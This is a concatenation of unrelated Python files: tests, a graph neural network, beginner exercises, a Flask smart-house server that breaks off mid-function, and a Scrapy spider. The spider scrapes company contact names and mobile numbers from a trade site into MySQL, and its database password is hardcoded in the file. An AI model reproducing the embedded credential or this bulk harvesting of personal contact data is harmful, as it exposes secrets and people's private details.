unittest\n\n unittest::Resource(name=\"res\", desired_value=\"x\", fail=true)\n \"\"\"\n )\n project.deploy_resource(\"unittest::Resource\", status=const.ResourceState.failed)\n\n project.compile(\n \"\"\"\n import unittest\n\n unittest::Resource(name=\"res\", desired_value=\"x\", skip=true)\n \"\"\"\n )\n project.deploy_resource(\"unittest::Resource\", status=const.ResourceState.skipped)\n\n\ndef test_resource_fail_skip_data(project):\n project.compile(\n \"\"\"\n import unittest\n\n unittest::Resource(name=\"res\", desired_value=\"x\")\n \"\"\"\n )\n\n project.deploy_resource(\"unittest::Resource\", status=const.ResourceState.deployed)\n\n DATA[\"res\"][\"skip\"] = True\n project.deploy_resource(\"unittest::Resource\", status=const.ResourceState.skipped)\n\n DATA[\"res\"][\"skip\"] = False\n DATA[\"res\"][\"fail\"] = True\n project.deploy_resource(\"unittest::Resource\", status=const.ResourceState.failed)\n\n\ndef test_retrieve_logs(project):\n project.compile(\n \"\"\"\n import unittest\n\n unittest::Resource(name=\"res\", desired_value=\"x\")\n \"\"\"\n )\n project.deploy_resource(\"unittest::Resource\")\n\n assert project.unittest_resource_exists(name=\"res\")\n logs = project.get_last_logs()\n assert len(logs) == 3\n\n project.dryrun_resource(\"unittest::Resource\")\n logs = project.get_last_logs()\n assert len(logs) == 2\n\n\ndef test_close_cache(project):\n project.compile(\n \"\"\"\n import unittest\n\n unittest::Resource(name=\"res\", desired_value=\"x\")\n \"\"\"\n )\n\n project.deploy_resource(\"unittest::Resource\")\n res = project.get_resource(\"unittest::Resource\")\n handler = project.get_handler(res, False)\n project.finalize_handler(handler)\n versions = handler.cache.counterforVersion.keys()\n assert len(versions) == 0\n assert len(handler.cache.cache) == 0\n\n\ndef test_280_sys_executable(project):\n \"\"\"\n Make sure the current python interpreter is the same as the one used by the compiler\n \"\"\"\n assert Path(project._env_path) == Path(sys.executable).parent.parent\n","repo_name":"inmanta/pytest-inmanta","sub_path":"examples/testhandler/tests/test_handler.py","file_name":"test_handler.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"10417323008","text":"'''\nCreated on 13 Dec 2021\n\n@author: aftab\n'''\nfrom torch_geometric.datasets import Planetoid\nimport torch\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GATConv\nimport logging\n\n\n\n\n\nclass GAT(torch.nn.Module):\n def __init__(self):\n super(GAT, self).__init__()\n self.hid =32\n self.in_head = 1\n self.out_head = 1\n \n \n self.conv1 = GATConv(dataset.num_features, self.hid, heads=self.in_head)\n self.conv2 = GATConv(self.hid*self.in_head, dataset.num_classes, concat=False,\n heads=self.out_head)\n\n def forward(self, data):\n x, edge_index = data.x, data.edge_index\n \n x = self.conv1(x, edge_index)\n x = F.relu(x)\n x = F.dropout(x, p=0.6, training=self.training)\n \n x = self.conv2(x, edge_index)\n x = F.relu(x)\n x = F.dropout(x, p=0.6, training=self.training)\n return F.log_softmax(x, dim=1)\n \n \ndef callGAT(dat):\n stats={}\n global dataset\n dataset = dat\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n device = \"cpu\"\n \n model = GAT().to(device)\n data = dataset.to(device)\n \n \n optimizer = torch.optim.Adam(model.parameters(), lr=0.01, weight_decay=5e-4)\n loss_data=[]\n model.train()\n for epoch in range(200):\n model.train()\n optimizer.zero_grad()\n out = model(data)\n loss = F.nll_loss(out[data.train_mask], data.y[data.train_mask])\n loss_data.append(loss)\n loss.backward()\n optimizer.step()\n \n model.eval()\n _, pred = model(data).max(dim=1)\n \n correct = float(pred[data.val_mask].eq(data.y[data.val_mask]).sum().item())\n acc = correct / data.val_mask.sum().item()\n #print('GAT Accuracy Validation: {:.4f}'.format(acc))\n stats['val_acc']=acc\n \n correct = float(pred[data.test_mask].eq(data.y[data.test_mask]).sum().item())\n acc = correct / data.test_mask.sum().item()\n #print('GAT Accuracy Test: {:.4f}'.format(acc))\n \n stats['test_acc']=acc\n return stats,loss_data\n ","repo_name":"Aftab571/GraphsCodeBase","sub_path":"GATTest.py","file_name":"GATTest.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"74917342349","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy import Request\nimport time\nfrom bs4 import BeautifulSoup\nimport re\nimport random\nimport os\nimport requests\nimport pymysql\nimport json\nfrom ..items import HuiCongWangItem\n\nconn = pymysql.connect(host='192.168.1.210', user='root', passwd='zhangxing888', db='ktcx_buschance', port=3306,\n charset='utf8')\n\ncur = conn.cursor() # 获取一个游标\n\n\nclass DataSpider(scrapy.Spider):\n name = 'data'\n\n d_id_3 = '185'\n keywords_name = '冷库'\n # start_url = 'http://www.912688.com/chanpin/59277801597388C5-orderBymultiple-aoddesc-viewlist-page{}.html'\n num_2 = 1\n\n def start_requests(self):\n url = 'https://s.hc360.com/seller/search.html?kwd=%E5%A4%A7%E7%A0%81%E5%A5%B3%E8%A3%85&pnum=1&ee=1'\n\n yield Request(url=url, callback=self.parse, )\n\n def parse(self, response):\n try:\n li_list = response.xpath('//div[@class=\"cont-left\"]/div[@class=\"wrap-grid\"]//li')\n for li in li_list:\n li_url = li.xpath('./div[@class=\"NewItem\"]/div[@class=\"picmid pRel\"]/a/@href').extract()[0]\n detail_url = \"https:\" + li_url\n print('/////////////////////////', detail_url)\n yield Request(url=detail_url, callback=self.detail_parse)\n except:\n print('有点错~')\n\n def detail_parse(self, response):\n print('parse_detail>>>>>')\n # print('------------------------',response.text)\\\\\n item = HuiCongWangItem()\n\n # 获取公司的名字\n com_name = '-'\n try:\n com_name = response.xpath('//div[@class=\"comply-name\"]/p/a/text()')[0].extract()\n print(com_name)\n except:\n print(com_name)\n\n # 调用函数,执行sql语句\n try:\n # 执行sql语句,进行查询\n sql = \"SELECT COUNT(0) FROM bus_product WHERE three_level_id = '{}' AND com_name = '{}'AND is_del = '0'\".format(\n self.d_id_3, str(com_name))\n cur.execute(sql)\n # 获取查询结果\n result = cur.fetchall()\n result_count = int(result[0][0])\n print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!', result_count)\n # conn.connect()\n\n d_id_3_3 = self.d_id_3\n keywords_name_2 = self.keywords_name\n\n if result_count > 0:\n print('重复了')\n else:\n mobile = response.xpath('//*[@id=\"dialogCorMessage\"]//em/text()')[0].extract()\n mobile = re.findall(r'\\d+', mobile, re.S)[0]\n print('mobile..........', mobile)\n if mobile:\n print('爬--------------------------------------')\n\n # shuju(response, item, d_id_3_3, keywords_name_2)\n shuju(response, item, d_id_3_3, keywords_name_2)\n print('爬++++++++++++++++++++++++++++++++++++++')\n print('恭喜您,爬取{}成功,真是太厉害了!!!!!!'.format(self.num_2))\n self.num_2 += 1\n # return item\n else:\n print('没有电话不爬取')\n\n except:\n print('沒有这条数据')\n\n\ndef shuju(response, item, d_id_3_3, keywords_name_2):\n print('detail_p>>>>>>>>>>>>>>>>>')\n\n # 保存图片信息\n try:\n os_img_1 = []\n str_ran = str(random.randint(0, 999999))\n os_img_1.append(str_ran)\n os.makedirs('d:\\\\b2b\\\\{}'.format(str_ran))\n # 将图片链接保存到硬盘\n res_img = response.xpath(\n '//div[@class=\"tab-content-container\"]//li/div[@class=\"vertical-img zoomThumbActive\"]//img/@src').extract()\n\n os_img_2_list = []\n for img_url in res_img:\n img_url = 'https:' + img_url\n code_img = requests.get(url=img_url).content\n img_name = str(random.randint(1, 999999))\n with open('d:\\\\b2b\\\\{}\\\\{}.jpg'.format(str_ran, img_name), 'wb') as f:\n f.write(code_img)\n os_img_2 = 'http://img.ktcx.cn/b2b/' + '{}/{}.jpg'.format(str_ran, img_name)\n os_img_2_list.append(os_img_2)\n os_img_2_str_1 = os_img_2_list[0]\n os_img_2_str = ','.join(os_img_2_list)\n item['list_img'] = os_img_2_str_1\n item['imgs'] = os_img_2_str\n print('保存图片ok..')\n except:\n print('图片错误.')\n\n # create_date = scrapy.Field() # 创建时间\n create_date = '_'\n try:\n create_date = time.strftime('%Y.%m.%d %H:%M:%S ', time.localtime(time.time()))\n print(create_date)\n except:\n print(create_date)\n item['create_date'] = create_date\n\n # list_img = scrapy.Field() # 图片1\n\n # price = scrapy.Field() # 价格\n price = '-'\n try:\n price = response.xpath('//div[@id=\"oriPriceTop\"]/text()').extract()[0].replace(' ', '').replace('\\t', '').strip()\n print(price)\n except:\n print(price)\n item['price'] = price\n\n # title = scrapy.Field() # 标题\n title = '-'\n try:\n title = response.xpath('//*[@id=\"comTitle\"]/text()').extract()[0].replace(' ', '').replace('\\t', '').strip()\n print(title)\n except:\n print(title)\n item['title'] = title\n\n # way = scrapy.Field() # way\n if price != '_':\n way = '0'\n else:\n way = '1'\n print('way', way)\n item['way'] = way\n\n # two_level_id = scrapy.Field() # 二级id\n two_level_id = '-'\n sql = \"SELECT parent_id FROM bus_industry_category WHERE id = {}\".format(d_id_3_3)\n try:\n cur.execute(sql) # 执行sql语句\n results = cur.fetchall() # 获取查询的所有记录\n # 遍历结果\n for row in results:\n two_level_id = row[0]\n print('two_level_id', two_level_id)\n # 遍历结果\n except Exception as e:\n raise e\n item['two_level_id'] = two_level_id\n\n # one_level_id = scrapy.Field() # 一级id\n one_level_id = '-'\n sql = \"SELECT parent_id FROM bus_industry_category WHERE id = {}\".format(two_level_id)\n try:\n cur.execute(sql) # 执行sql语句\n results = cur.fetchall() # 获取查询的所有记录\n # 遍历结果\n for row in results:\n one_level_id = row[0]\n print('one_level_id', one_level_id)\n # 遍历结果\n except Exception as e:\n raise e\n item['one_level_id'] = one_level_id\n\n # three_level_id = scrapy.Field() # 三级id\n item['three_level_id'] = d_id_3_3\n\n # keywords = scrapy.Field()\n keywords_list = []\n keywords_dict = {}\n keywords_dict['id'] = ''\n keywords_dict['keyword'] = keywords_name_2\n keywords_list.append(keywords_dict)\n keywords_json = json.dumps(keywords_list)\n item['keywords'] = keywords_json\n print('keywords_json', keywords_json)\n\n # imgs = scrapy.Field()\n\n # detail = scrapy.Field()\n html = '-'\n res_detail_html = response.text\n try:\n soup = BeautifulSoup(res_detail_html, 'lxml')\n html = str(soup.find('div', id=\"pdetail\"))\n # print('html,,,,,,,,,,', html)\n except:\n print('_____')\n # print(html)\n item['detail'] = html\n\n # units = scrapy.Field()\n units = '-'\n try:\n # units = response.xpath('//div[@class=\"detail-right-con\"]/div[@class=\"item-row-w\"]/span[@class=\"supply-numb\"]/text()')[0].extract()\n # units = re.findall('[\\u4e00-\\u9fa5]+', units, re.S)[0]\n print('units', units)\n except:\n print('units', units)\n print('units', units)\n item['units'] = units\n\n # com_name = scrapy.Field()\n com_name = '-'\n try:\n com_name = response.xpath('//div[@class=\"comply-name\"]/p/a/text()')[0].extract()\n print('com_name', com_name)\n except:\n print(com_name)\n item['com_name'] = com_name\n\n # linkman = scrapy.Field()\n linkman = '-'\n try:\n linkman = response.xpath('//*[@id=\"dialogCorMessage\"]/div[@class=\"p name\"]/em/text()')[0].extract()\n linkman = re.findall('[\\u4e00-\\u9fa5]+', linkman, re.S)[0]\n print('linkman', linkman)\n except:\n print(linkman)\n item['linkman'] = linkman\n\n # mobile = scrapy.Field()\n mobile = '-'\n try:\n mobile = response.xpath('//*[@id=\"dialogCorMessage\"]//em/text()')[0].extract()\n mobile = re.findall(r'\\d+', mobile, re.S)[0]\n print('mobile', mobile)\n except:\n print(mobile)\n item['mobile'] = mobile\n","repo_name":"kokohui/con_spider","sub_path":"慧聪网系列/慧聪网抓取/会聪网信息采集/hui_cong_wang/hui_cong_wang/spiders/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"74876353869","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\n\no = np.ones([4, 4], dtype=int)\no[2, 3] = 2\no[3, 1] = 6\nprint(o)\n\no = np.zeros([6, 6], dtype=float)\no[2, 3] = 2\no[3, 1] = 6\nprint(o)\n\nprint(np.arange(6))\nprint(np.arange(0, 51, 10)[:, np.newaxis])\n\nprint(np.arange(6) + np.arange(0, 51, 10)[:, np.newaxis])\n\n\n\nif __name__ == '__main__':\n import doctest\n\n doctest.testmod()\n","repo_name":"krajcovic/python-tests","sub_path":"scipytest/slicing.py","file_name":"slicing.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"2868386932","text":"# 1. naem x and y - see if 2xX is greater then 10 print, else print\nx = 5\ny = 10\nif (2*x > 10):\n print (\"#1 works!\")\nelse:\n print(\"#1 Untrue..\")\n\n\n# 2. rename x and y - see if the length of the word dog is less then x print, else print\nx = 5\ny = 10\nif len(\"dog\") < x:\n print(\"#2 works!\")\nelse:\n print(\"#2 Untrue..\")\n\n# 3. rename x and y - see if x to the power of 3 is greater then or equal to y and y to the power of 2 is less then 26 print, else print\nx = 3\ny = 5\nif (x ** 3 >= y) and (y ** 2 < 26):\n print(\"#3 Works!\")\nelse:\n print(\"#3 Untrue..\")\n\n# 4. - find dan in the group!\nname = \"Dan\"\ngroup_one = (\"Tony\", \"Fred\", \"Jolene\")\ngroup_two = (\"Dan\", \"Steve\", \"Mary\", \"Peggy\")\ngroup_three = (\"Lisa\", \"Joe\", \"Kevin\", \"Tonya\")\nif name in group_one:\n print(name + \" is in group one\")\nelif name in group_two:\n print(name + \" is in group two\")\nelif name in group_three:\n print(name + \" is in group three\")\nelse:\n print(\"Dan is not coming\")\n\n# 5.\nheight = 66\nage = 16\nadult_permission = True\n\nif (height > 70) and (age >= 18):\n print(\"Can ride all the roller coasters\")\nelif (height > 65) and (age >= 18):\n print(\"Can ride moderate roller coasters\")\nelif (height > 60) and (age >= 18):\n print(\"Can ride light roller coasters\")\nelif ((height > 50) and (age >= 18)) or ((adult_permission) and (height > 50)):\n print(\"Can ride bumper cars\")\nelse:\n print(\"Stick to lazy river\")\n","repo_name":"Ksheekey/RBootcamp","sub_path":"cw/03-Python/1/Activities/06-Stu_ConditionalConundrum/Unsolved/conditionals_unsolved.py","file_name":"conditionals_unsolved.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"15417312258","text":"\"\"\"\nFile: khansole_academy.py\n-------------------------\nKhansole Academy is a program that teaches users how to add by asking users to input answers for the addition of two\nrandomly generating integers between 10 and 99 inclusive. The program returns feedback based on the User's answers.\n\n\"\"\"\n\nimport random\n\n# ********************************** YOUR CODE GOES BELOW HERE *********************************************************\nfran_num=random.randint(10,99)\n#the first random variable assignment\nsran_num=random.randint(10,99)\n# the second random variable assignment.\nsolution=int(fran_num+sran_num)\n# The addition varibale to the two previous variable.\ncount = 1\n# assigning the variable for the number of tries.\nwhile count <= 3:\n#this to repeat the sequence until a TRUE condition is met.\n fran_num=random.randint(10,99)\n #the first random variable assignment\n sran_num=random.randint(10,99)\n # the second random variable assignment.\n solution=int(fran_num+sran_num)\n # The addition varibale to the two previous variable.\n print(\"What is the answer for\",fran_num, \"+\" ,sran_num)\n user_input=int(input(\"Answer:\"))\n # Here this is displayed to request for the user's input\n if user_input==solution:\n print(\"Correct!! You've gotten \" ,count,\" correct answer in a row.\")\n \n count+=1\n #This displays information if the user gets the answer correct.\n else:\n count=1\n #this is to reset the counting.\n print(\"Incorrect. The expected answer is\",solution)\n # if the answer is wrong this information is displayed.\n \n \n \n","repo_name":"MbrohUno/Python_Projects","sub_path":"khansole_academy_starter.py","file_name":"khansole_academy_starter.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"38400252613","text":"from control_unit.communication.coms import app, db#, bcrypt\nfrom flask import render_template, url_for, flash, redirect, request, jsonify, json\nimport requests as req\nimport datetime\nfrom flask_login import login_user, current_user, logout_user\nimport pickle\nimport time\n#from control_unit.communication.coms.forms import RegistrationForm, LoginForm, UserInputForm\n#from control_unit.communication.coms.models import User, UserInput, SensorData\n#from ...submodules.database.database_DONE import Database\n# gui server\nurl = 'http://127.0.0.1:5000'\n\n# Smarthouse specifications\nnum_rooms = 5\n\n# Defining the home page of our site\n@app.route(\"/\") # the \"/\" set the route to current page\ndef home():\n\treturn render_template(\"index.html\", head=\"Smart-house\", content=\"Super awesome communication module\") # basic inline html for testing\n\n# Adding a dynamic URL, creating output based on url\n\"\"\"\n@app.route(\"/\", methods=['GET'])\ndef user(usr):\n\tif current_user.is_authenticated:\n\t\tuser = User.query.filter_by(username=usr).first()\n\t\tuser_input = UserInput.query.filter_by(user_id=user.id).first()\n\t\treturn render_template(\"user.html\", title=usr, head=usr, user_input=user_input)\n\telse:\n\t\treturn render_template(\"index.html\", title=usr, head=usr, content=f\"Er det Faurs lille {usr}-mus?!\")\n\n# Adding a redirect url to troll P3-B3-209\n@app.route(\"/taber\")\ndef taber():\n\treturn \"

Lol nice try hacker

\"\n\n# Redirecting from a url to another url\n@app.route(\"/admin\")\ndef admin():\n\treturn redirect(url_for(\"user\", usr=\"Admin!\"))\n\n# Creating a way to register new users\n@app.route(\"/register\", methods=['GET','POST'])\ndef register():\n\t# Check to see if the user is already logged in, if yes redirect to home page\n\tif current_user.is_authenticated:\n\t\treturn redirect(url_for('home'))\n\tform = RegistrationForm()\n\t# If registered swap to home page and display success message\n\tif form.validate_on_submit():\n\t\t# Hashing the password input\n\t\thashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n\t\t# Creating and input for the user table and commit to table\n\t\tuser = User(username=form.username.data, password=hashed_password)\n\t\tdb.session.add(user)\n\t\tdb.session.commit()\n\t\tflash(f'Account created for {form.username.data}!', 'success')\n\t\treturn redirect(url_for('login'))\n\treturn render_template('register.html', title='Register', form=form)\n\n# Testing GET and POST\n@app.route(\"/login\", methods=['GET','POST'])\ndef login():\n\tif current_user.is_authenticated:\n\t\treturn redirect(url_for('home'))\n\tform = LoginForm()\n\t# If login successful swap to home page and display succes message\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=form.username.data).first()\n\t\t# check if password input matches the users password in the database\n\t\tif user and bcrypt.check_password_hash(user.password, form.password.data):\n\t\t\tlogin_user(user, remember=form.remember.data)\n\t\t\tflash(f'{user.username} has been logged in!', 'success')\n\t\t\treturn redirect(url_for('home'))\n\t\telse:\n\t\t\tflash(f'login Unsuccessful. Please check username and password', 'danger')\n\treturn render_template('login.html', title='Login', form=form)\n\n@app.route(\"/logout\")\ndef logout():\n\tif current_user.is_authenticated:\n\t\tlogout_user()\n\t\treturn redirect(url_for(\"home\"))\n\treturn redirect(url_for(\"home\"))\n\n@app.route(\"/User-\", methods=['GET','POST'])\ndef userinput(usr):\n\tform = UserInputForm()\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=usr).first()\n\t\texists = UserInput.query.filter_by(user_id=user.id).first()\n\t\tif exists:\n\t\t\tDB\n\t\t\tUpdate user input in the database\n\n\t\t\texists.mac = form.mac.data\n\t\t\texists.work_start = form.work_start.data\n\t\t\texists.work_end = form.work_end.data\n\t\t\texists.sleep_start = form.sleep_start.data\n\t\t\texists.sleep_end = form.sleep_end.data\n\t\t\tdb.session.commit()\n\t\t\tflash(f'Data for {user.username} succesfully updated!', 'success')\n\t\t\treturn redirect(url_for('home'))\n\t\telse:\n\t\t\tDB\n\t\t\tCreate new row with the new user input\n\n\t\t\tuser_input = UserInput(mac=form.mac.data, work_start=form.work_start.data, work_end=form.work_end.data, sleep_start=form.sleep_start.data, sleep_end=form.sleep_end.data, user_id=user.id)\n\t\t\tdb.session.add(user_input)\n\t\t\tdb.session.commit()\n\t\t\tflash(f'Data for {user.username} succesfully created!', 'success')\n\t\t\treturn redirect(url_for('home'))\n\treturn render_template('userinput.html', title=usr, form=form)\n\"\"\"\n@app.route(\"/api/sensor/\", methods=['POST'])\ndef sensor(sensor_id):\n\tif request.method =='POST':\n\t\t\n\n\t\tsensor = str(sensor_id)\n\t\tsensor = sensor.replace(\"_\", \" \")\n\t\tprint(f'Coms: Sensor der skriver {sensor}')\n\t\tdata = request.form\n\n\t\tif (data.get(\"temp\") != \"nan\") and (data.get(\"hum\") != \"nan\"):\n\t\t\ttemp = float(data.get(\"temp\"))\n\t\t\thum = int(float(data.get(\"hum\")))\n\t\t\tmot = int(data.get(\"mot\"))\n\t\t\tinsertData = (sensor, temp, hum, mot)\n\t\t\tprint(f'coms: sensor data {insertData}')\n\t\t\t#db.insert_query(\"RH\", insertData)\n\n\t\telif (data.get(\"temp\") == \"nan\") and (data.get(\"hum\") == \"nan\"):\n\t\t\tprint(f'coms: received temp & hum = \"nan\" from sensor')\n\t\t\ttemp = 99.1\n\t\t\thum = 125\n\t\t\tmot = int(data.get(\"mot\"))\n\t\t\tinsertData = (sensor, temp, hum, mot)\n\t\t\tprint(f'coms: sensor data {insertData}')\n\t\t\t#db.insert_query(\"RH\", insertData)\n\n\t\telif (data.get(\"temp\") == \"nan\"):\n\t\t\tprint(f'coms: received temp = \"nan\" from sensor')\n\t\t\ttemp = 99.1\n\t\t\thum = int(float(data.get(\"hum\")))\n\t\t\tmot = int(data.get(\"mot\"))\n\t\t\tinsertData = (sensor, temp, hum, mot)\n\t\t\tprint(f'coms: sensor data {insertData}')\n\t\t\t#db.insert_query(\"RH\", insertData)\n\n\t\telif (data.get(\"hum\") == \"nan\"):\n\t\t\tprint(f'coms: received hum = \"nan\" from sensor')\n\t\t\ttemp = float(data.get(\"temp\"))\n\t\t\thum = 125\n\t\t\tmot = int(data.get(\"mot\"))\n\t\t\tinsertData = (sensor, temp, hum, mot)\n\t\t\tprint(f'coms: sensor data {insertData}')\n\t\t\t#db.insert_query(\"RH\", insertData)\n\t\t\n\t\tdb.insert_query(\"RH\", insertData)\n\n\t\t#------- Alt over skal markeres ud ------------#\n\n\t\trooms = ['Bathroom', 'Bedroom', 'Garage', 'Kitchen', 'Living room']\n\n\t\tfor idx, room in enumerate(rooms):\n\t\t if room == sensor:\n\t\t index_value = idx\n\t\t break\n\n\t\tprint(\"Creating /dev/shm/sensorjar\")\n\t\tfilename = '/dev/shm/sensorjar'\n\n\t\twith open(filename, 'rb') as FileObject:\n\t\t\tRawData = FileObject.read()\n\t\tmotion_list = pickle.loads(RawData)\n\t\tmotion_list = motion_list[\"sensor\"]\n\t\tmotion_list[index_value] = int(data.get(\"mot\"))\n\t\tdata = {\"sensor\":motion_list}\n\t\tserialized = pickle.dumps(data)\n\t\twith open(filename, 'wb') as file_object:\n\t\t\tfile_object.write(serialized)\n\n\t\treturn 'ok', 200\n\telse:\n\t\treturn 'failed', 404\n\n@app.route(\"/api/gui//\", methods=['GET', 'POST'])\ndef gui(sub):\n\tif sub == 'power':\n\t\tif request.method =='GET':\n\t\t\t# ? Test me\n\t\t\t'''\n\t\t\tDB: return current status of rooms\n\t\t\t1. get all current status data\n\t\t\t2. format data to get only\n\t\t\t\t- room id\n\t\t\t\t- power state\n\t\t\trooms_power_state = {\n\t\t\t\t'room1': True,\n\t\t\t\t'room2': True,\n\t\t\t\t'room3': False,\n\t\t\t\t'room4': True,\n\t\t\t\t'room5': True\n\t\t\t}\n\t\t\t'''\n\n\t\t\troom_names = ['room1', 'room2', 'room3', 'room4', 'room5']\n\t\t\tGetRoomState = []\n\t\t\tGetRoomState = db.get_power_state()\n\t\t\tprint(f'Coms: GET | Database PowerState: {GetRoomState}')\n\t\t\tget_rooms_power_state = {}\n\t\t\tfor i, room in enumerate(room_names):\n\t\t\t\tif GetRoomState[i] == 1:\n\t\t\t\t\tget_rooms_power_state[room] = True\n\t\t\t\telse:\n\t\t\t\t\tget_rooms_power_state[room] = False\n\t\t\tprint(f'coms: GET | get_rooms_power_state {get_rooms_power_state}')\n\t\t\t\"\"\"\n\t\t\t#jsonify(success=True)\n\t\t\tmessage = {\n\t\t\t 'message': \"OK\",\n\t\t\t 'powerstate': get_rooms_power_state,\n\t\t\t 'status': 200\n\t\t\t}\n\t\t\tresp = jsonify(message)\n\t\t\tresp.status_code = 200\n\t\t\tresp.headers.add('Access-Control-Allow-Origin', '*')\n\t\t\t\"\"\"\n\t\t\treturn get_rooms_power_state, 200\n\n\t\telif request.method =='POST':\n\n\t\t\troom_names = ['room1', 'room2', 'room3', 'room4', 'room5']\n\t\t\treceived_rooms_power_state = {}\n\t\t\tfor i in range(5):\n\t\t\t\t#print(request.form.get(room_names[i]))\n\t\t\t\tif(request.form.get(room_names[i]) == 'True'):\n\n\t\t\t\t\treceived_rooms_power_state[room_names[i]] = True\n\t\t\t\telse:\n\t\t\t\t\treceived_rooms_power_state[room_names[i]] = False\n\t\t\tprint(f'coms: POST | received_rooms_power_state: {received_rooms_power_state}')\n\t\t\t# TODO Jarvis skal tilføjes til backend\n\t\t\t'''\n\t\t\t------------ Back End Server --------------\n\t\t\tTo Jarvis: change power-status of room(s)\n\t\t\t1. update room(s) with id from request.form['rooms']\n\t\t\t2. return success or error response\n\t\t\t3. if error respons: try to forward the cmd to Jarvis again\n\t\t\t4. else: return success response with cmd just applied\n\t\t\t------------ Front End Server --------------\n\t\t\t5.\n\t\t\t'''\n\t\t\tPostRoomState = []\n\t\t\tPostRoomState = db.get_power_state()\n\t\t\t#print(f'Coms: POST | Current power_state {PostRoomState}')\n\t\t\tpost_rooms_power_state = {}\n\t\t\tfor i, room in enumerate(room_names):\n\t\t\t\tif PostRoomState[i] == 1:\n\t\t\t\t\tpost_rooms_power_state[room] = True\n\t\t\t\telif PostRoomState[i] == 0:\n\t\t\t\t\tpost_rooms_power_state[room] = False\n\t\t\tprint(f'Coms: POST | post_rooms_power_state: {post_rooms_power_state}')\n\t\t\tCurrent_keys = list(post_rooms_power_state.keys())\n\t\t\tCurrent_values = list(post_rooms_power_state.values())\n\t\t\tReceived_keys = list(received_rooms_power_state.keys())\n\t\t\tReceived_values = list(received_rooms_power_state.values())\n\n\t\t\tprint(f'Coms: POST | Received_values: {Received_values}')\n\t\t\tprint(f'Coms: POST | Current_values: {Current_values}')\n\n\t\t\tdata = {}\n\t\t\tresponse_state = received_rooms_power_state\n\t\t\tcounter = 0\n\t\t\tfor i, value in enumerate(Current_values):\n\t\t\t\tif value is not Received_values[i]:\n\t\t\t\t\tif Received_values[i] == True:\n \t\t\t\t\t\tdata[Received_keys[i]] = 1\n \t\t\t\t\t\tresponse_state[room_names[i]] = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tdata[Received_keys[i]] = 0\n\t\t\t\t\t\tresponse_state[room_names[i]] = False\n\t\t\t\t\tcounter += 1\n\n\t\t\tif counter == 5:\n\t\t\t\tprint('all(rv)', all(Received_values))\n\t\t\t\tif all(Received_values):\n\t\t\t\t\tdata = {\"All\":1}\n\t\t\t\telif any(Received_values) == False:\n\t\t\t\t\tdata = {\"All\":0}\n\n\t\t\t#print(data)\n\t\t\tfilename = '/dev/shm/picklejar'\n\t\t\tprint(f'Coms: Shared data to be inserted: {data}')\n\t\t\tserialized = pickle.dumps(data)\n\n\t\t\twith open(filename,'wb') as file_object:\n\t\t\t file_object.write(serialized)\n\n\t\t\t\"\"\"\n\t\t\tprint(f'Coms: POST RESPONSE | response_state {response_state}')\n\t\t\tfor i, key in enumerate(data):\n\t\t\t\tprint(f'Coms: key: {key} | value: {data[key]}')\n\t\t\t\tdb.power_room(i+1, data[key])\n\t\t\t\"\"\"\n\n\t\t\treturn response_state, 200\n\n\telif sub == 'history':\n\t\tif request.method =='GET':\n\t\t\t# ? Test me\n\t\t\t'''\n\t\t\tDB: return room history\n\t\t\t1. get all room history data\n\t\t\t2. format data to get only\n\t\t\t\t- time\n\t\t\t\t- room id\n\t\t\t\t- power state\n\t\t\t\t- temperature\n\t\t\t\t- humidity\n\t\t\t'''\n\n\n\t\t\troom_data = [0 for x in range(num_rooms)]\n\t\t\tpower_data = [0 for x in range(num_rooms)]\n\t\t\troom = ['Bathroom', 'Bedroom', 'Garage', 'Kitchen', 'Living room']\n\n\t\t\tfor i, roomID in enumerate(room):\n\t\t\t\troom_data[i], power_data[i] = db.get_plot_data(roomID)\n\n\t\t\tprint(type(room_data))\n\t\t\tpower_data_parsed = []\n\t\t\tfor x in range(num_rooms):\n\t\t\t\tfor room in room_data[x]:\n\t\t\t\t\ttimestamp = room[0]\n\t\t\t\t\ttimestamp = timestamp.strftime('%d-%m, %H:%M:%S')\n\t\t\t\t\troom[0] = timestamp\n\n\t\t\t\tfor room in power_data[x]:\n\t\t\t\t\troom = list(room)\n\t\t\t\t\ttimestamp = room[0]\n\t\t\t\t\ttimestamp = timestamp.strftime('%d-%m, %H:%M:%S')\n\t\t\t\t\troom[0] = timestamp\n\t\t\t\t\tpower_data_parsed.append(room)\n\n\t\t\t#print(\"Sorted samlet room_data\")\n\t\t\t#print(room_data)\n\n\t\t\t#print(\"-------------------------\")\n\t\t\tfor x in range(num_rooms):\n\t\t\t\t#print(\"Room data:\")\n\t\t\t\t#print(room_data[x])\n\t\t\t\t#print(\"Power data:\")\n\t\t\t\t#print(power_data_parsed[x])\n\t\t\t\tfor y in range(len(power_data_parsed)):\n\t\t\t\t\troom_data[x].extend([power_data_parsed[y]])\n\t\t\tfor i in room_data:\n\t\t\t\tprint(i)\n\t\t\tfor x in range(num_rooms):\n\t\t\t\troomNum = 1\n\t\t\t\tlastTemp = 0\n\t\t\t\tlastHum = 0\n\t\t\t\tlastPower = [0 for x in range(2)]\n\t\t\t\tfor i, data in enumerate(room_data[x]):\n\t\t\t\t\tif i == 0:\n\t\t\t\t\t\tif len(data) == 